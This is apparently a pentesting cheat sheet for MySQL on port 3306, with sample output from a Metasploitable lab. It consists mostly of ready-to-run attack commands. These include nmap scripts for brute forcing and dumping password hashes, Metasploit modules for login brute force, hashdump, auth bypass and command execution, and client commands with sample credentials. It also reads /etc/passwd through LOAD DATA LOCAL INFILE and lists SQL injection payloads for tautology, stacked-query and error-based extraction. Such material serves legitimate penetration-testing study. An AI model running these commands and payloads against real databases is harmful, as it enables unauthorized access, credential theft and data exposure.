Skip to content

3306 - Pentesting mysql

MySQL is a popular open-source relational database management system (RDBMS). It is used for storing, organizing, and retrieving large amounts of data in a structured manner. MySQL is known for its reliability, flexibility, and performance, making it suitable for a wide range of applications, including web-based applications, data warehousing, and business intelligence.

nmap

sudo nmap -Pn -sV -sC -vv -p 3306 $IP

sudo nmap -vv -p 3306 --script=mysql-enum $IP
sudo nmap -vv -p 3306 --script=mysql-audit $IP
sudo nmap -vv -p 3306 --script=mysql-brute $IP
sudo nmap -vv -p 3306 --script=mysql-databases $IP
sudo nmap -vv -p 3306 --script=mysql-dump-hashes $IP --script-args='username=root,password=password'
sudo nmap -vv -p 3306 --script=mysql-empty-password $IP
sudo nmap -vv -p 3306 --script=mysql-info $IP
sudo nmap -vv -p 3306 --script=mysql-query $IP
sudo nmap -vv -p 3306 --script=mysql-users $IP
sudo nmap -vv -p 3306 --script=mysql-variables $IP
sudo nmap -vv -p 3306 --script=mysql-vuln-cve2012-2122 $IP

metasploit

version 

use auxiliary/scanner/mysql/mysql_version
set RHOSTS 10.0.2.8
run
|->
10.0.2.8:3306 is running MySQL 5.0.51a-3ubuntu5
enumerating 
use auxiliary/admin/mysql/mysql_enum
set RHOSTS 10.0.2.8
run
|->
MySQL Version: 5.0.51a-3ubuntu5      
Compiled for the following OS: debian-linux-gnu
Architecture: i486                                             
Server Hostname: metasploitable                              
Data Directory: /var/lib/mysql/      
Logging of queries and logins: OFF         
Old Password Hashing Algorithm OFF                           
Loading of local files: ON                  
Deny logins with old Pre-4.1 Passwords: OFF
Allow Use of symlinks for Database Files: YES                
Allow Table Merge: YES                      
SSL Connections: Enabled                            
SSL CA Certificate: /etc/mysql/cacert.pem
SSL Key: /etc/mysql/server-key.pem          
SSL Certificate: /etc/mysql/server-cert.pem
files enum 
use auxiliary/scanner/mysql/mysql_file_enum
set RHOSTS 10.0.2.8
set FILE_LIST /usr/share/wordlists/seclists/Fuzzing/LFI/LFI-gracefulsecurity-linux.txt
run
|->
/etc/passwd is a file and exists
/etc/hosts is a file and exists
login bruteforce 
use auxiliary/scanner/mysql/mysql_login
set RHOSTS 10.0.2.8
set PASS_FILE /usr/share/wordlists/rockyou.txt
set STOP_ON_SUCCESS true
run
|->
10.0.2.8:3306 - Success: 'root:'
other

  • msf> use auxiliary/admin/mysql/mysql_sql
  • msf> use auxiliary/scanner/mysql/mysql_authbypass_hashdump
  • msf> use auxiliary/scanner/mysql/mysql_hashdump -> Creds
  • msf> use auxiliary/scanner/mysql/mysql_schemadump -> Creds
  • msf> use exploit/windows/mysql/mysql_start_up -> Execute commands Windows, Creds

mysql client

install mysql client 

sudo apt install default-mysql-client
local 
mysql -u root # Connect to root without password
mysql -u root -p # A password will be asked (check someone)
mysql --user=root --password=password
not-interactive mode - just execute query 
mysql --user="drifter" --password="imjustdrifting31" -e "show databases"
mysql --user="drifter" --password="imjustdrifting31" -D "textpattern_db" -e "show tables"
remote 
mysql -h $IP -u root
mysql -h $IP -u root@localhost
mysql -h $IP --user=root --password=password
remote + proxychains 
proxychains -q mysql -h $IP

mysql commands

show databases;
use <database-name>;
show tables;
select * from <table-name>
mysql arbitrary read file by client 
mysql> load data local infile "/etc/passwd" into table test FIELDS TERMINATED BY '\n';

sql injection

x' or 1=1 -- x
x' or (1=1 and username='admin') -- x
x' or (1=1 and (SELECT count(*) FROM users) = 1) -- x
x'; SELECT CAST(password AS DATE) FROM users; -- x
version 
SELECT @@version
tables 
SELECT null,table_name,null FROM information_schema.tables WHERE table_schema = 'sqli_one'

SELECT null,GROUP_CONCAT(DISTINCT CONCAT(table_name)),null FROM information_schema.tables WHERE table_schema = 'sqli_one'
columns 
SELECT null,column_name,null FROM information_schema.columns WHERE table_name = 'staff_users'
get value with error 
SELECT null, extractvalue(1, concat('=', 'That will be returned as error')),null

SELECT null, extractvalue(1, concat('=', (SELECT GROUP_CONCAT(DISTINCT CONCAT(table_name)) FROM information_schema.tables WHERE table_schema = 'sqli_one'))),null

function

Name Description
BENCHMARK() Repeatedly execute an expression
CHARSET() Return the character set of the argument
COERCIBILITY() Return the collation coercibility value of the string argument
COLLATION() Return the collation of the string argument
CONNECTION_ID() Return the connection ID (thread ID) for the connection
CURRENT_USER() , CURRENT_USER The authenticated user name and host name
DATABASE() Return the default (current) database name
FOUND_ROWS() For a SELECT with a LIMIT clause, the number of rows that would be returned were there no LIMIT clause
LAST_INSERT_ID() Value of the AUTOINCREMENT column for the last INSERT
ROW_COUNT() The number of rows updated
SCHEMA() Synonym for DATABASE()
SESSION_USER() Synonym for USER()
SYSTEM_USER() Synonym for USER()
USER() The user name and host name provided by the client
VERSION() Return a string that indicates the MySQL server version